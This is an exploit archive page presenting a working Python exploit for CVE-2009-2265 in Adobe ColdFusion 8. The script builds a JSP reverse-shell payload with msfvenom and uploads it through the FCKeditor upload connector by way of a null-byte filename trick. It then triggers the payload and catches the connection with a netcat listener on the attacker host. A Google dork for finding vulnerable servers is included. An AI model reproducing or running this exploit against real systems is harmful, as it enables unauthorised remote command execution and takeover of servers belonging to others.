exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Adobe ColdFusion 8 Remote Command Execution

Adobe ColdFusion 8 Remote Command Execution
Posted Jun 24, 2021
Authored by Pergyz

Adobe ColdFusion 8 remote command execution exploit.

tags | exploit, remote
advisories | CVE-2009-2265
SHA-256 | 2641dc8dea746f5bc8e25940e7ce8a00223a7fa63b29a5e18fae874ce86d1220

Adobe ColdFusion 8 Remote Command Execution

Change Mirror Download
# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE)
# Google Dork: intext:"adobe coldfusion 8"
# Date: 24/06/2021
# Exploit Author: Pergyz
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
# Version: 8
# Tested on: Microsoft Windows Server 2008 R2 Standard
# CVE : CVE-2009-2265

#!/usr/bin/python3

from multiprocessing import Process
import io
import mimetypes
import os
import urllib.request
import uuid

class MultiPartForm:

def __init__(self):
self.files = []
self.boundary = uuid.uuid4().hex.encode('utf-8')
return

def get_content_type(self):
return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8'))

def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()

if mimetype is None:
mimetype = (mimetypes.guess_type(filename)[0] or 'application/octet-stream')

self.files.append((fieldname, filename, mimetype, body))
return

@staticmethod
def _attached_file(name, filename):
return (f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n').encode('utf-8')

@staticmethod
def _content_type(ct):
return 'Content-Type: {}\r\n'.format(ct).encode('utf-8')

def __bytes__(self):
buffer = io.BytesIO()
boundary = b'--' + self.boundary + b'\r\n'

for f_name, filename, f_content_type, body in self.files:
buffer.write(boundary)
buffer.write(self._attached_file(f_name, filename))
buffer.write(self._content_type(f_content_type))
buffer.write(b'\r\n')
buffer.write(body)
buffer.write(b'\r\n')

buffer.write(b'--' + self.boundary + b'--\r\n')
return buffer.getvalue()

def execute_payload():
print('\nExecuting the payload...')
print(urllib.request.urlopen(f'http://{rhost}:{rport}/userfiles/file/{filename}.jsp').read().decode('utf-8'))

def listen_connection():
print('\nListening for connection...')
os.system(f'nc -nlvp {lport}')

if __name__ == '__main__':
# Define some information
lhost = '10.10.16.4'
lport = 4444
rhost = "10.10.10.11"
rport = 8500
filename = uuid.uuid4().hex

# Generate a payload that connects back and spawns a command shell
print("\nGenerating a payload...")
os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp')

# Encode the form data
form = MultiPartForm()
form.add_file('newfile', filename + '.txt', fileHandle=open(filename + '.jsp', 'rb'))
data = bytes(form)

# Create a request
request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00', data=data)
request.add_header('Content-type', form.get_content_type())
request.add_header('Content-length', len(data))

# Print the request
print('\nPriting request...')

for name, value in request.header_items():
print(f'{name}: {value}')

print('\n' + request.data.decode('utf-8'))

# Send the request and print the response
print('\nSending request and printing response...')
print(urllib.request.urlopen(request).read().decode('utf-8'))

# Print some information
print('\nPrinting some information for debugging...')
print(f'lhost: {lhost}')
print(f'lport: {lport}')
print(f'rhost: {rhost}')
print(f'rport: {rport}')
print(f'payload: {filename}.jsp')

# Delete the payload
print("\nDeleting the payload...")
os.system(f'rm {filename}.jsp')

# Listen for connections and execute the payload
p1 = Process(target=listen_connection)
p1.start()
p2 = Process(target=execute_payload)
p2.start()
p1.join()
p2.join()

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close